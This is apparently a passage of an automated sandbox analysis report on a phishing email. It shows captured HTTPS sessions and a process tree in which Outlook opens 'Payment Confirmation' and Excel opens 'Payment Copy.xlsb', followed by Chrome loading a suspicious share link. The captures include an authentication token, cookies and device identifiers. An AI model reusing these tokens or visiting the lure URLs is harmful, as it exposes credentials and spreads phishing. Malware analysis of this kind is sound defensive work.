                                                                                                                                              2024-11-06 15:56:11 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              98192.168.2.184989220.190.159.0443
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:12 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Content-Type: application/soap+xml
                                                                                                                                              Accept: */*
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                              Content-Length: 4828
                                                                                                                                              Host: login.live.com
                                                                                                                                              2024-11-06 15:56:12 UTC4828OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                              2024-11-06 15:56:12 UTC569INHTTP/1.1 200 OK
                                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                              Expires: Wed, 06 Nov 2024 15:55:12 GMT
                                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                              x-ms-route-info: C539_SN1
                                                                                                                                              x-ms-request-id: 38c7135c-09d0-4d58-907c-1d61a7cf5005
                                                                                                                                              PPServer: PPV: 30 H: SN1PEPF00040151 V: 0
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:11 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Content-Length: 11197
                                                                                                                                              2024-11-06 15:56:12 UTC11197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              99192.168.2.18498932.23.209.141443
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:13 UTC2746OUTGET /client/config?cc=CH&setlang=en-CH HTTP/1.1
                                                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                              X-UserAgeClass: Unknown
                                                                                                                                              X-BM-Market: CH
                                                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                              X-Device-OSSKU: 48
                                                                                                                                              X-BM-DTZ: -300
                                                                                                                                              X-DeviceID: 01000A410900B03D
                                                                                                                                              X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
                                                                                                                                              X-Search-TimeZone: Bias=300; StandardBias=0; TimeZoneKeyName=Eastern Standard Time
                                                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                                                              X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAbW4Es2hMpK5%2BddDfrXHLRCOrS5qJBXtwmrW1l7DH9IXk92VZIQUjsdnGGTcmrgftbAv6lYViiBDcm4F/QmhXUSVKzR/iEVer%2BZY5ZcADrFAEV8w9jd2YRGacQ3JiIbuMnvcUaNkeYpe%2BIH1AdG2p%2Bmzxn1tO0bkrTeTjqxas9EwyiokS5uKCY1yszHAzulNyjfNX2KjRHTT0JGWXNldPgdl1pv/Qa3vYqQKp54VBDOW9qkyNnbo991eXwsZZKEsH3SlIrRVEDfxWOWBdcucbcT2cENqSMwc83zgIcoz0vPO3xO6vBfQeKvGcQueiiArjFYqE3lzxnWGmNtAThL0SL4QZgAAEFUl6hgu/QaViKb6gFpDkeqwAUcGgkA/SRRLec4QiMWli7Qd4KfGl23Rv4R3VMEiRL7NPjYdphvDBTDvhFYcEqYJgiss79IvYJY1GNWiMe8hnvEBVgalpHyA0NSGuqUxzkhF1y%2BG/uwpfjvYkocCpUp1%2BQbMddvazsSSbU5In53rCD0E8VI7XMN6RV4d%2BG4WlRJ2PWyRyI4Xyams4DKXQ3YcVpp8ZddLwVgEE8y131a4AfJG7saNlt3twgsGT//q4UR9KmXFuG51ZavertC/JVQo0ouQOHyYF4wvBFO%2BNUlQT1rYqkmoxkCvwBh/0Mi7mPE6y8SC2v02zQtN%2BQ3zQ7M%2BEWBy8LERaaYkC64MZvSIlb4cQNyDbSaWf3IAV7IYE%2BDHOMNJc7ZKloB8HpY0CoKlyr4ehXUQMKYl2LsVmJfS7K7uPZG1hzj1ZAcREpV2snKxiDoZd1T%2B0BMaewBtcSpd90QivcXrNcD/1EaFUloxokDwtHAeY3SygSqz332L3iBvlQNGD1u55XN2TV0xfx03YI7VJiy/RZdP3j4gZz0OtnMuCZnbdJqLQJz0UZElwSRDKXcVbcJnw [TRUNCATED]
                                                                                                                                              X-Agent-DeviceId: 01000A410900B03D
                                                                                                                                              X-BM-CBT: 1730908570
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                              X-Device-isOptin: false
                                                                                                                                              Accept-language: en-GB, en, en-US
                                                                                                                                              X-Device-Touch: false
                                                                                                                                              X-Device-ClientSession: BFC66F85B991465C9E514F75CCD2F1B6
                                                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                              Host: www.bing.com
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Cookie: SRCHUID=V=2&GUID=B4BB39E5F80E411D94C438C0FA7ACF94&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&LUT=1707317051026&IPMH=6b344233&IPMID=1707317270835&HV=1707317277; ANON=A=680C1B1A649CBD64DD40EBFCFFFFFFFF; MUID=BC76BB0020D345C1A049A4820CB4C03C; MUIDB=BC76BB0020D345C1A049A4820CB4C03C
                                                                                                                                              2024-11-06 15:56:13 UTC1197INHTTP/1.1 200 OK
                                                                                                                                              Content-Length: 2215
                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                              Cache-Control: private
                                                                                                                                              X-EventID: 672b919dcb4e4a1a99e9ba03cdf76452
                                                                                                                                              X-AS-SetSessionMarket: de-ch
                                                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:13 GMT
                                                                                                                                              Connection: close
                                                                                                                                              Set-Cookie: _EDGE_S=SID=14B6CCF00A8E6A990530D9DF0BB06BA5&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                                                              Set-Cookie: SRCHHPGUSR=SRCHLANG=en&LUT=1707317051026&IPMH=6b344233&IPMID=1707317270835&HV=1707317277; domain=.bing.com; expires=Mon, 01-Dec-2025 15:56:13 GMT; path=/; secure; SameSite=None
                                                                                                                                              Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                                              Set-Cookie: _SS=SID=14B6CCF00A8E6A990530D9DF0BB06BA5; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                                                              X-CDN-TraceID: 0.39d01702.1730908573.10bb5d10
                                                                                                                                              2024-11-06 15:56:13 UTC2215INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 46 65 61 74 75 72 65 43 6f 6e 66 69 67 22 3a 7b 22 53 65 61 72 63 68 42 6f 78 49 62 65 61 6d 50 6f 69 6e 74 65 72 4f 6e 48 6f 76 65 72 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 68 6f 77 53 65 61 72 63 68 47 6c 79 70 68 4c 65 66 74 4f 66 53 65 61 72 63 68 42 6f 78 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 6f 78 55 73 65 53 65 61 72 63 68 49 63 6f 6e 41 74 52 65 73 74 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 75 74 74 6f 6e 55 73 65 53 65 61 72 63 68 49 63 6f 6e 22 3a 7b 22 76 61 6c 75 65
                                                                                                                                              Data Ascii: {"version":1,"config":{"FeatureConfig":{"SearchBoxIbeamPointerOnHover":{"value":true,"feature":""},"ShowSearchGlyphLeftOfSearchBox":{"value":true,"feature":""},"SearchBoxUseSearchIconAtRest":{"value":false,"feature":""},"SearchButtonUseSearchIcon":{"value


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              100192.168.2.184989635.190.80.14432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:38 UTC549OUTOPTIONS /report/v4?s=4%2BsN3PZc97n6PKudD929%2FFkUrxNi6P45%2BA5%2FZoIdl6gmKsT4Jjb5aPVxKvKnboZaVG003A0NU44c5TgMDQUcn%2B2%2FnhKPjAHRzV%2FRwsTMOsIrLAUSVgQ%2FPWxyXChG3g%3D%3D HTTP/1.1
                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:56:38 UTC336INHTTP/1.1 200 OK
                                                                                                                                              Content-Length: 0
                                                                                                                                              access-control-max-age: 86400
                                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                                              date: Wed, 06 Nov 2024 15:56:38 GMT
                                                                                                                                              Via: 1.1 google
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              101192.168.2.184989735.190.80.14432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:39 UTC487OUTPOST /report/v4?s=4%2BsN3PZc97n6PKudD929%2FFkUrxNi6P45%2BA5%2FZoIdl6gmKsT4Jjb5aPVxKvKnboZaVG003A0NU44c5TgMDQUcn%2B2%2FnhKPjAHRzV%2FRwsTMOsIrLAUSVgQ%2FPWxyXChG3g%3D%3D HTTP/1.1
                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Content-Length: 1829
                                                                                                                                              Content-Type: application/reports+json
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:56:39 UTC1829OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 30 37 33 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 38 30 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 73 2e 63 61 6c 69 66 72 61 67 69
                                                                                                                                              Data Ascii: [{"age":30735,"body":{"elapsed_time":1807,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://ns.califragi
                                                                                                                                              2024-11-06 15:56:39 UTC168INHTTP/1.1 200 OK
                                                                                                                                              Content-Length: 0
                                                                                                                                              date: Wed, 06 Nov 2024 15:56:39 GMT
                                                                                                                                              Via: 1.1 google
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close


                                                                                                                                              Click to jump to process

                                                                                                                                              Click to jump to process

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Click to jump to process

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:10:54:42
                                                                                                                                              Start date:06/11/2024
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Payment Confirmation (237 KB).msg"
                                                                                                                                              Imagebase:0x560000
                                                                                                                                              File size:34'446'744 bytes
                                                                                                                                              MD5 hash:91A5292942864110ED734005B7E005C0
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:10:54:43
                                                                                                                                              Start date:06/11/2024
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "6E799949-CC68-4C7D-ACF7-DFDB99ECC467" "1E1CE2FA-2E8B-476D-B466-DDE64F014E37" "3112" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                                                                                                                                              Imagebase:0x7ff7d06c0000
                                                                                                                                              File size:710'048 bytes
                                                                                                                                              MD5 hash:EC652BEDD90E089D9406AFED89A8A8BD
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:9
                                                                                                                                              Start time:10:54:56
                                                                                                                                              Start date:06/11/2024
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LF0A6GI2\Payment Copy.xlsb"
                                                                                                                                              Imagebase:0x4c0000
                                                                                                                                              File size:53'161'064 bytes
                                                                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:11
                                                                                                                                              Start time:10:54:58
                                                                                                                                              Start date:06/11/2024
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" /Embedding
                                                                                                                                              Imagebase:0x4c0000
                                                                                                                                              File size:53'161'064 bytes
                                                                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:true

                                                                                                                                              Target ID:13
                                                                                                                                              Start time:10:55:19
                                                                                                                                              Start date:06/11/2024
                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://app.marmof.com/share/01jc0wzptpy7bepvzk4ner7dc5
                                                                                                                                              Imagebase:0x7ff728d30000
                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:14
                                                                                                                                              Start time:10:55:19
                                                                                                                                              Start date:06/11/2024
                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1860,i,6018047205410846205,15210405168536307558,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                              Imagebase:0x7ff728d30000
                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              Target ID:18
                                                                                                                                              Start time:10:56:00
                                                                                                                                              Start date:06/11/2024
                                                                                                                                              Path:C:\Windows\splwow64.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                              Imagebase:0x7ff7a3f40000
                                                                                                                                              File size:163'840 bytes
                                                                                                                                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              No disassembly